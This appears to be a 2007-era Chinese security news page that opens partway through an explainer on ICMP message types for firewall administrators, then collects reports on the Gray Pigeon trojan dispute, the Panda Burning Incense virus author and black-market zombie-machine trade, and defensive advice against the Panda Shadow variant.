  “Traceroute”:大多数Traceroute程序(Windows中的Tracert.exe除外)向关闭的端口发送UDP包。这引起一系列的背靠背的ICMP Port Unreachable包发回来。因此你看到防火墙显示这样ICMP包,可能是防火墙后面的人在运行Traceroute。你也会看到TTL增加。

  3) Type = 3, Code = 4 (Fragmentation Needed and Don‘t Fragment was Set)

  这是由于路由器打算发送标记有(DF, 不允许片断)的IP报文引起的。为什么?IP和TCP都将报文分成片断。TCP在管理片断方面比IP有效得多。因此,饯堆趋向于找到“Path MTU”(路由最大传输单元)。在这个过程将发送这种ICMP包。

  假设ALICE和BOB交谈。他们在同一个以太网上(max frame size = 1500 bytes),但是中间有连接限制最大IP包为600 byte。这意味着所有发送的IP包都要由路由器切割成3个片断。因此在TCP层分割片断将更有效。TCP层将试图找到MTU(最大传输单元)。它将所有包设置DF位(Don‘t Fragment),一旦这种包碰到不能传输如此大的包的路由器时路由器将发回ICMP错误信息。由此,TCP层能确定如何正确分割片断。

  你也许应该允许这些包通过防火墙。否则,当小的包可以通过达到目的地建立连接,而大包会莫名其妙的丢失断线。通常的结果是,人们只能看到Web页仅显示一半。

  路由最大传输单元的发现越来越整合到通讯中。如IPsec需要用到这个功能。

  (三) Type = 4 (Source Quench)

  这种包可能是当网络通讯超过极限时由路由器或目的主机发送的。但是当今的许多系统不生成这些包。原因是现在相信简单包丢失是网络阻塞的最后信号(因为包丢失的原因就是阻塞)。

  现在source quenches的规则是(RFC 1122):

  路由器不许生成它们

  主机可以生成它们

  主机不能随便生成它们

  防火墙应该丢弃它们

  但是,主机遇到Source Quench仍然减慢通讯,因此这被用于DoS。防火墙应该过滤它们。如果怀疑发生DoS,包中的源地址是无意义的,因为IP地址肯定是虚构的。

  已知某些SMTP服务器会发送Source Quench。

  (四) Type = 8 (Echo aka PING)

  这是ping请求包。有很多场合使用它们;它可能意味着某人扫描你机器的恶意企图,但它也可能是正常网络功能的一部分。参见Type = 0 (Echo Response)

  很多网络管理扫描器会生成特定的ping包。包括ISS扫描器,WhatsUp监视器等。这在扫描器的有效载荷中可见。许多防火墙并不记录这些,因此你需要一些嗅探器捕捉它们或使用入侵检测系统(IDS)标记它们。

  记住,阻挡ping进入并不意味着Hacker不能扫描你的网络。有许多方法可以代替。例如,TCP ACK扫描越来越流行。它们通常能穿透防火墙而引起目标系统不正常的反应。

  发送到广播地址(如x.x.x.0或x.x.x.255)的ping可能在你的网络中用于smurf放大。

  (五) Type = 11 (Time Exceeded In Transit)

  这一般不会是Hacker或Cracker的攻击

  1) Type = 11, Code = 0 (TTL Exceeded In Transit)

  这可能有许多事情引起。如果有人从你的站点traceroute到Internet,你会看到许多来自路由器的TTL增加的包。这就是traceroute的工作原理:强迫路由器生成TTL增加的信息来发现路由器。

  防火墙管理员看到这种情况的原因是Internet上发生路由循环。路由器Flapping(持续变换路由器)是一个常见的问题,常会导致循环。这意味着当一个IP包朝目的地前进时,这个包被一个路由器错误引导至一个它曾经通过的路由器。如果路由器在包经过的时候把TTL域减一,这个包只好循环运动。实际上当TTL值为0时它被丢弃。

  造成这种情况的另一个原因是距离。许多机器(Windows)的默认TTL值是127或更低。路由器也常常会把TTL值减去大于1的值,以便反应诸如电话拨号或跨洋连接的慢速连接。因此,可能由于初始TTL值太小,而使站点无法到达。此外,一些Hacker/Cracker也会使用这种办法使站点无法到达。

  2) Type = 11, Code = 1 (Fragment Reassembly Time Exceeded)

  当发送分割成片断的IP报文时,发送者并不接收所有片断。通常,大多数TCP/IP通讯甚至不分割片断。你看到这种情况必定是采用了分割片断而且你和目的地之间有阻塞。

  (六) Type = 12 (Parameter Problem)

  这可能意味着一种进攻。有许多足印技术会生成这种包。

新闻一周谈:金山毒霸剑指灰鸽子,你支持谁?

新闻一周谈:金山毒霸剑指灰鸽子,你支持谁?

出处:PConline

作者:罗山伯

  3月15日是“消费者权益保护日”。金山公司选择在这一天高调向昔日“毒王”——灰鸽子宣战,引发外界对金山公司有意借“炒作”推广金山毒霸的质疑。孰是孰非,颇具争议。

  针对Windows Vista屡遭破解的话题,PConline“软件资讯”频道组织了一次深度与广度兼具的“全民大讨论”活动。山伯意犹未尽,准备在本期周谈中结合上周最新的新闻热点,就此问题作进一步的简要探讨。

Windows产品为高价付出代价:

  据报道,微软中国于3月12日证实:北京盛安德科技发展有限公司以正版操作系统半价的价格销售的3套Windows 2000 Professional操作系统为非法授权软件。消息传出,令人愕然!因为,涉嫌销售盗版Windows操作系统的竟是微软的“金牌经销商”。



Windows 2000竟被“金牌经销商”监守自盗

  受人之托却不能忠人之事。这种监守自盗的行为再度为理性人自利的本性作了注脚,也再一次应证了PConline“软件资讯”主编Echo发出的“都是价差惹的祸”的担忧。

  在PConline“软件资讯”频道独家策划的“Vista破解-软件厂商编辑大讨论”中,软件业界的众多专业人士各抒高见却又“英雄所见略同”。参与讨论的软件厂商和编辑们均对破解甚至盗版商业软件的行为持反对态度,但同时又对造成当前破解之风盛行的大气候深感无奈。



软件业界的众多专业人士各抒高见

稍有经济学常识的人都知道,一种商品的价格高低除了会影响消费者对该商品的需求量之外,还会左右到消费者对其替代商品的需求。

  由于在知名度、普及程度和可操作性等方面有着较大的差距,崇尚“开源”的Linux虽低价却未能成为Windows的替代品。在Windows价格过高变相降低了消费者的购买能力时,消费者自然而然地便把目光投放到了盗版的Windows操作系统身上。

  目前,Windows主流操作系统的彩包装版本动辄数千的价格远远超出了消费者的承受能力;为适应中国市场而推出的Windows简包装版本(COEM版)同样高估了用户的消费水平。

  看来要反盗版,微软不能光从软件销售渠道着手,而应该依靠硬件合作伙伴预装最低价的OEM版Windows。用硬件服务掩盖软件成本将能大大减弱用户对“价格”的敏感性。“品牌机”获得比DIY更大的优势,进一步推广与普及的空间还是广阔的。



“软”、“硬”兼施普及Windows

金山毒霸剑指“灰鸽子”涉嫌炒作?

  3月15日,金山公司也投身到了打假的浪潮当中。这一次,金山公司的矛头直指“灰鸽子工作室”,指责后者以“远程管理软件”之名行木马盗窃之实。



金山公司矛头直指“灰鸽子”

  对于金山公司的指控,灰鸽子工作室立即于3月16日在官方网站上发表声明,宣称其产品具有正当性与合法性,将金山公司的大动作定位为“商业公关行为”,并明确表示“不会参与到某些杀毒软件厂商的公关炒作中来,也希望广大网民不要受到误导”。针对灰鸽子工作室的声明,金山公司提出了四大质疑,更宣誓要“将正义进行到底”!



灰鸽子工作室低调回应金山公司的指控

  刀光剑影,让人应接不暇。“灰鸽子工作室”所研发的“灰鸽子软件”是否就是臭名昭著的木马“灰鸽子”?对此问题我们暂且不论,因为整个事件中还有更引人遐想的细节。

  “危害超出熊猫烧香10倍”(雷军语)的“灰鸽子”当前“正在大规模集中爆发”,而瑞星和江民却都无动于衷,甚至还与金山公司大唱反调。瑞星公司用数据说话,认为“灰鸽子目前并未集中规模爆发”,而江民公司也认为灰鸽子其实可轻松查杀。

  同是国内知名的杀毒软件厂商,金山、瑞星与江民在“熊猫烧香”肆虐期间对卡巴斯基趾高气扬的傲慢同仇敌忾,却为何在“灰鸽子事件”中分道扬镳?这让人不得不对金山公司究竟是仗义直言还是有意炒作持怀疑的态度。



瑞星“灰鸽子”病毒专题的更新停留在2005年

不可否认,金山公司的种种做法和炒作的特点“不谋而合”。

  第一,制造矛盾,激化争端。金山公司高调出击,在“灰鸽子工作室”作出低调回应后又不依不饶,并渲染金山毒霸官方网站曾遭“灰鸽子团伙报复”一事,大有故意把事情搞大的想法。

  第二,神秘化灰鸽子,借以达到将其妖魔化的效果。被江民称为“入门级病毒”的灰鸽子在金山公司眼中却成了善于隐藏自己、危害性强的“毒中忍者”。

  第三,夸大事态,实有所求。江民认为用户对灰鸽子“无须恐慌”,金山公司却苦口婆心地奉劝用户提高警惕,个中必有蹊跷。看到了金山公司在相关专题网站上宣称金山毒霸2007对灰鸽子可以达到“全面通杀+永久防护”的效果,而金山公司提供的“灰鸽子专杀工具”则可以“快速解决灰鸽子”以后,我们才恍然大悟:敢情是在这儿等着我们呢!



金山毒霸2007:全面通杀+永久防护

  可见,金山公司将矛头对准灰鸽子,其目的在于使外界的焦点聚集在金山毒霸身上。3月18日星期天上午9点零4分,山伯就在央视新闻频道上看到了关于“灰鸽子事件”的报道,央视采访的对象正是金山公司的工程师……

  在国内同行不愿配合,在“灰鸽子工作室”不愿“参与”的情况下,金山公司的独角戏还能唱多久?我们搬张凳子隔岸观火便是。

  不过,话说回来。对于威胁到自身切实利益的木马病毒,我们还是应该以“宁可信其有,不可信其无”的态度严正以待,完全没有必要抵制金山公司的“炒作”。如此,才能真正地做到防患于未然。

用户投诉 360安全卫士推出灰鸽子卸载

CNET中国·ZOL 【原创】 作者:中关村在线 泡泡鱼

近日,奇虎360安全中心接到数百名网民关于“灰鸽子”的询问和举报,反映灰鸽子给他们带来了极大困扰。360安全卫士紧急升级,截止到发稿时间为止,奇虎360安全卫士已经能够为网民提供多达上万种的灰鸽子及其变种的卸载功能。网民只要下载最新版的360安全卫士(http://www.360safe.com )就可以对电脑进行全面检查,查出隐藏在自己电脑中的“无形黑手”。

据了解,“灰鸽子”实际上早就流传于网络,具有远程监控、盗号、窃取隐私等功能,其本身虽然不具备传播性,但是由于其获取便利,“灰鸽子”已经成为了一款入门级别的黑客程序,为黑客入侵用户的电脑提供了方便。根据金山公司的统计显示,随着“灰鸽子2007”的发布,该病毒正在大规模集中爆发,仅2007年2月,中国约有258,235台计算机感染灰鸽子,大约每10台感染病毒的计算机中,就有一台感染了“灰鸽子”。

而来自360安全中心的数据也显示,“灰鸽子”病毒的网民投诉率于近日迅速提升。在360安全卫士的官方论坛中以“灰鸽子”为关键词进行搜索,获得的网民投诉、讨论帖子多达近800篇,其中绝大多数在2007年发表。而在刚刚发布不久的网民举报平台(http://baike.360safe.com )中,有关“灰鸽子”的投票参与者近200名,其中78%的网友认为其“很差”,360软件百科根据网友投票和卸载情况,给“灰鸽子”的用户评价分数仅为“-544”分。

奇虎安全中心表示,网民对自己的电脑有知情权和选择权,对于他们不喜欢的软件,他们有权利选择删除。此次紧急升级,就是为了响应360安全卫士用户的需求。

奇虎360安全卫士欢迎广大网民到360社区论坛(http://baike.360saef.com )上对“灰鸽子”进行评价,并提醒网民尽快将360安全卫士升级至最新版本。

专家称网民无需恐慌“灰鸽子”病毒

《新闻晚报》 【转载】

针对流传的“灰鸽子病毒正在大规模暴发”这一说法,多家反病毒公司日前称,该病毒并没有大规模暴发的迹象,广大用户无需恐慌。

  近日,某安全公司发布病毒报告称,“灰鸽子”正在大规模暴发,并且其危害10倍于“熊猫烧香”。一时间,有关“灰鸽子”的各种传言充斥网上。据反病毒专家介绍,“灰鸽子”曾在去年上半年度被评为当年十大病毒之“毒王”,是一种后门程序,黑客可借此远程控制被感染病毒的电脑,随意上传下载、删除或修改用户电脑中的文件并盗取用户网络游戏账号及银行密码。

  反病毒专家指出,目前80%以上的木马后门病毒都具备远程监控、盗号等功能,“灰鸽子”只是其中的一种。其之所以会有如此大的传播范围,主要有两方面原因:一是在网上可以很容易得到“灰鸽子”;二是由于“灰鸽子”作为一款入门级黑客程序,对一些黑客新手来说,使用起来会更容易。专家建议用户不必对“灰鸽子”恐慌,目前的杀毒软件对“灰鸽子”病毒均有很好的防御能力,只要平时注意防范病毒,安装杀毒软件并及时升级病毒库,就能有效地将“灰鸽子”拒之门外。

熊猫烧香背后黑客社会:老板月入200万

《第一财经日报》 【转载】

通过“江湖传言”得知,在一个庞大的犯罪链条中,处于利润最丰厚环节的“老板”远在上海,他可能通过比“熊猫烧香”隐蔽得多的病毒,或者是其他不为外人所知的手段,每个月攫取200万元的财富。

李俊还远非一个“完美”的罪犯,更大的“老板”可能通过比“熊猫烧香”隐蔽得多的病毒,每个月攫取200万元的财富。

舆论和李俊制造的电脑病毒一样厉害,从年前到年后,这个武汉新洲阳逻的25岁“男孩”蹲在湖北仙桃市第一看守所,外面是铺天盖地的关于他和他同伙被抓的报道。他剃光了头,觉得颜面尽失。他弱弱地说他不想再接受采访了,惭愧于自己让父母没有过好这个年。

在看守所他接受了太多的采访。这个时候的他,像他喜爱的熊猫一样,被推到公众的视线之下,不同的是,这并无荣光。

这是个要强的“男孩”,但他是个成年人。他用没长大的心态给中国的数百万台电脑制造了一场灾难,所以他被剃了光头,关在这里。在被抓之前,他爱漂亮,网上有他戴着蛤蟆镜咧着嘴巴笑的靓照,头发蓬松,发型时尚。如果按照家乡亲友老师的说法,李俊还算一个乖孩子。但对那些只能从电脑死机和“熊猫作揖”中感受李俊的万千网民来说,他却是个不折不扣的“刺儿头”。

绝大部分人所见过的李俊的照片,是他的光头照,目光呆滞、神情沮丧。而只有少数人才见过,警方在侦破案件过程中,从李俊的某个网上私人空间找到的蛤蟆镜照片。照片上,李俊笑得很惬意。

李俊并非魔头。他只是个普通的没有接受过高等教育的湖北青年。在湖北,中专和技校的数量是全国最多的。无数的乡村和城镇的父母将孩子送入这些职业学校,期望用短一些的教育周期来完成送孩子走入社会的艰辛历程。李俊这个从小就很聪明的孩子不幸也因为这些原因放弃了读高中考大学的路,到父母所在的“水泥系统”所属的技校读书。不幸的还有,李俊对这条道路缺乏兴趣,20岁之后,他就成了一个自由人—— 没有值钱的学历,没有“单位”,也就没有稳定的收入和相应的社会保障。

和这些不幸因素同时影响到李俊的还有,互联网在中国普通青年中的普及。不知道这个因素应该归于幸运,还是不幸?对于年轻的李俊来说,既然学校里面学到的东西不足以满足他的求知欲——他可从小就喜欢拆装电子和机械小玩意儿——2001年左右,他开始着迷般地学习电脑和网络知识。网吧是他学习的场所。

就像一个孩童闯入了枪械库。网上聊天、网络游戏这类玩意儿根本就无法满足李俊学习的“本能”,而当一个黑客,对于肯学习的李俊来说,已非难事。互联网就是最好的老师,也是最好的实验室。从2003年起,李俊已经开始了编写病毒的疯狂“修炼”。2006年作乱于互联网的“熊猫烧香”病毒,不过是李俊三年病毒编写历史中的集大成者,此前,他编写过“武汉男孩”系列病毒、“QQ尾巴”病毒,并已经知道如何用病毒牟利。

在李俊武汉住所搜出来的一沓机票显示了这一点。李俊供认说,这些机票是他去各地见网友产生的。机票上的时间大部分是2005年。这个时间在李俊编写“熊猫烧香”之前,但他见各地网友目的是什么,目前还没有案卷能够显示这一点。可供猜想的是,他的这些飞行,对他后来的炫耀式犯罪也许有很重要的影响。

QQ是李俊和网友们联络的重要工具。据说李俊的QQ号码是5位数的,这么短的号码,在QQ用户中,意味着“资深”或者“有路子”。无论是李俊,还是王磊,抑或其他被抓嫌犯,QQ群是个好东西,他们一天都离不开。王磊他们所在的QQ群有近200 人,加入的方式是朋友介绍,由群主批准。这个群讨论的内容是黑客技术和“黑客经济”。当然,“黑客经济”他们不懂,但他们知道这东西“来钱”。

在提讯的警察面前,1986年出生的叶培新还显得一脸稚气,眼泪是他的一大半“交代”。他一再嗫嚅地问自己会判几年。作为与李俊同期被刑拘的6名嫌犯之一,叶培新年龄最小,尚是温州市一所大学的学生,他就是借助QQ群,逐步学会如何用病毒牟利的。

实际上,加上在大年初五被抓的涉嫌制作“熊猫烧香”变种“金猪报喜”的云南个旧人薛庆,归案的才7人。而通过QQ群向李俊直接或间接购买过病毒的,就不少于120人。在警方的一份档案中,记录着一长串下一步要侦缉和抓捕的嫌犯的网名。

通过群里面的交流,配合黑客论坛,有的人慢慢有了技术,有的人越来越会“忽悠”,还有的人越来越懂得如何用病毒“来钱”。在这个微型“江湖”里,李俊(或是他的网名DAVE,或是小名小俊)慢慢有了自己的名气。李俊有自己的“定位”。在那并不完全成熟的心智的指引下,他懂得积攒实力,但积攒的实力到了一定程度,他又忍不住要炫耀。这种炫耀让他名利双收,不过,也招来了警察,招致了法律的制裁

李俊的同行说,李俊的病毒并不合常规。病毒应该“随风潜入夜,润物细无声”,让感染病毒的机器毫无征兆才是“王道”。但李俊的“熊猫烧香”之所以出名,是因为这种病毒发作的一个特征,就是将电脑里面的可执行文件和超文本文件的图标更改,变成李俊喜欢的“熊猫烧香”模样。这等于是告诉用户,你的电脑中毒了。

李俊的炫耀还表现在他通过病毒里面的编码和其他黑客打招呼。“武汉男孩”病毒的得名,源自于这个病毒留下了“武汉男孩”字样,这是李俊类似梅花大盗的作案方式,传说中的梅花大盗作案后要在现场留下梅花印记。初出茅庐的李俊急于传达一个讯息:有一个武汉人出山了,有一个武汉人正在成长为一个职业黑客。

长期没有稳定工作的李俊已经通过“武汉男孩”和“QQ尾巴”病毒取得过收入,否则他根本不能阔绰地坐飞机四处见网友。而见网友,应该有更大的利益在里面。似乎可以猜想成这是李俊的一个“游学”计划,这个计划为李俊编写出传播性极强的“熊猫烧香” 病毒创造了条件。李俊交代说,他为自己的“熊猫烧香”病毒开价是1000元,但2005年之前他又是如何赚钱的,目前公安部门还在审讯之中。卖病毒只是李俊们取得收入的途径之一,通过病毒控制大量“肉机”,然后将这些“肉机”卖给需要的人,更容易实现收入的规模化。

“肉机”者肉鸡也,是李俊们对中毒电脑的称呼。通过对“肉机”的控制,嫌犯们成批量窃取账号密码等有价值的信息,他们的邮箱里面放着成千上万的对其原本主人可能有重要意义的数据,而在他们的犯罪链条里面,这些数据是被批发的,每个甚至低至几分钱。

普通互联网用户随时可能为他们的粗心付出代价。山东籍嫌犯王磊说,其实,要防止中毒很简单,把操作系统的补丁打全就可以了。这个厨师学校毕业的年轻人才二十出头,通过和李俊合伙销售“肉机”,他一个月赚了8万元。即使在被抓后,他仍然处于前所未有的“幸福”之中。办案民警说,这小子,我们问一句,他要交代十句,我们还要让他慢点说。即使身在囹圄,他的脸上也看不出压抑,而是恨不得充当整个案件的新闻发言人。

李俊说话的声音则小如蚊虫拍打翅膀。当然,也许在监狱里面才是这样。当他的父亲前来探监,他拒绝相见。也许当初,他心中有一个长远的计划,用病毒赚到更多的钱,确切地说,是很多的钱,能够让他像同乡雷磊(同案犯)一样买一辆车,再在武汉市区买套房子,或者还可以找个漂亮网友当老婆,总之至少要过上当初他上广州、北京去大公司求职时梦想过的那样的生活。那时候,不管能否对家人公开收入来源,至少他的父亲会以他为荣。

一方面,李俊花钱非常谨慎,受家庭影响他对生活并不讲究。但另一方面他又大手大脚,坐飞机见网友,大概还有两台笔记本电脑和一台台式电脑,这可以理解为他“工作需要”和摆阔,也可以理解为他在给自己混乱的生活某种补偿。他借住在朋友罗某租的房子里面,里面杂乱无章,其组成形态和某些疯狂的IT创业者、闭关准备考研的学生的临时居所非常相似。李俊没有女朋友,大有“熊猫还在烧香,何以家为”的气概。当然,他的工作需要保密,社交圈子很有限,也影响了他个人问题的解决。

混乱的生活既加剧了李俊回归秩序的愿望,也给了他进一步皈依混乱的怂恿。从李俊的“烧香”历程中,看得出他还远非一个“完美”罪犯,他只不过编写了一个近乎“完美”的病毒而已。是庞大的黑客社会(也是一种黑社会)的需要放大了他的犯罪能力,让他编写的病毒荼毒了小半个中国互联网。当利益滚滚而来,李俊没有拒之门外的抵御力,但他那个工人家庭也给不了他充当技术独行侠的胆色。犯罪土壤和犯罪心理也是一种病毒,它们也还在进化之中。只要李俊生存的客观社会条件依然存在,并不断演化,难保不出现真正的“完美大盗”——“他”有惊人的破坏力,掠走惊人的财富,并不留半点痕迹。

通过“江湖传言”得知,在一个庞大的犯罪链条中,处于利润最丰厚环节的“老板”远在上海,他可能通过比“熊猫烧香”隐蔽得多的病毒,或者是其他不为外人所知的手段,每个月攫取200万元的财富。这类犯罪团伙的破获,难度要大得多。 李俊自己也似乎察觉到了这一点。网上流传过一个号称是李俊自己编写的“熊猫烧香”专杀工具和李俊致网友的道歉信,信中写道,网上还会有更厉害的病毒,他希望网友们要注意自我保护。这句话暗示着李俊视野中的互联网只是一个篱栅破败的菜园子,而病毒有如幽灵,随时会再来袭。

熊猫影子隐蔽偷袭 企业局域网成新目标

作者:smtk 来源:赛迪网安全社区

“真是太倒霉了!‘熊猫烧香’病毒那么严重的时候,我们公司的局域网都没有中毒,没想到今天却中了熊猫烧香的变种病毒!”王先生抱怨道。昨天,江民公司接到了王先生的求助电话,说公司的局域网中了一种未知的病毒,后经江民反病毒工程师分析确认,王先生公司中的是“熊猫烧香”的最新变种病毒“熊猫影子”。

  “我们平时也很注意对局域网的维护和对病毒防范,管理员权限都设置了密码,真不知道病毒是怎么侵入我们的系统的。”王先生对中毒事件感到十分困惑。

  江民反病毒专家分析说,“熊猫影子”病毒最大的特点就是,他会通过自身随带的密码字典对其它电脑进行用户名和密码的穷举破解,并扫描磁盘感染exe、SCR.、PIF、Com、 Bat文件,被感染的文件图标无明显变化。因此即使设置了管理员权限的密码,但如果密码不够强健,仍然很有可能被破解侵入。同时病毒能自我复制到SYSTEM32系统目录下,并在释放相应的DLL类型文件后删除原病毒文件,增加了病毒的隐蔽性,普通用户很难及时采取有效的应对措施,对于企业用户来说,所造成的损失则更为巨大的。

  有数据显示,在我国的1000多万中小型企业中,其中80%以上的中小型企业都没有安装网络版杀毒软件,导致企业局域网长期带毒运行,全国中小型企业每年因病毒所造成的损失高达80亿元!与此同时,从近年来病毒的攻击趋势来看,其重点也开始转向企业局域网及政府网站,在“熊猫烧香”爆发的仅仅一个月内,就有数千家企业网站遭到了攻击,造成的损失难以估量。

  “熊猫烧香”让更多的企业认识到企业网络安全的重要性,对于那些IT预算有限,技术人员缺乏的中小型企业则更是如此。那么作为企业用户,应该如何打造安全的网络环境,防范病毒对企业局域网的入侵呢?

  江民反病毒专家建议,企业用户应该安装网络版杀毒软件,并采用防火墙、VPN、邮件安全网关等设备,在互联网访问、内部网络访问、邮件收发等多环节、多层次地保护局域网络安全。同时在日常工作中,管理员应定期对系统进程、启动项和服务进行检测,提高对病毒的防范意识,做到“一升、二设、三不要”,确保企业局域网络安全。

一升:及时升级杀毒软件病毒库,并定时进行全网的病毒查杀。

二设:

1、在防火墙软件的配置中设好IP过滤规则,对可疑的IP地址进行封杀。

2、设置安装基于主机的IDS入侵检测系统,为事后的分析留下日志依据。

三不要:

1、如无必要,Windows2000/XP的用户不要开启IPC$共享,并给具有管理员权限的账号设置强健的密码。

2、在使用U盘等移动设备交换文件时,不要开启自动播放功能,要开启杀毒软件的实时监控,打开文件前要先进行杀毒。

3、不要随意访问来源不明的网站,及时安装微软的安全更新,特别是微软的MS06-014漏洞,应立即打好该漏洞补丁。

推广链接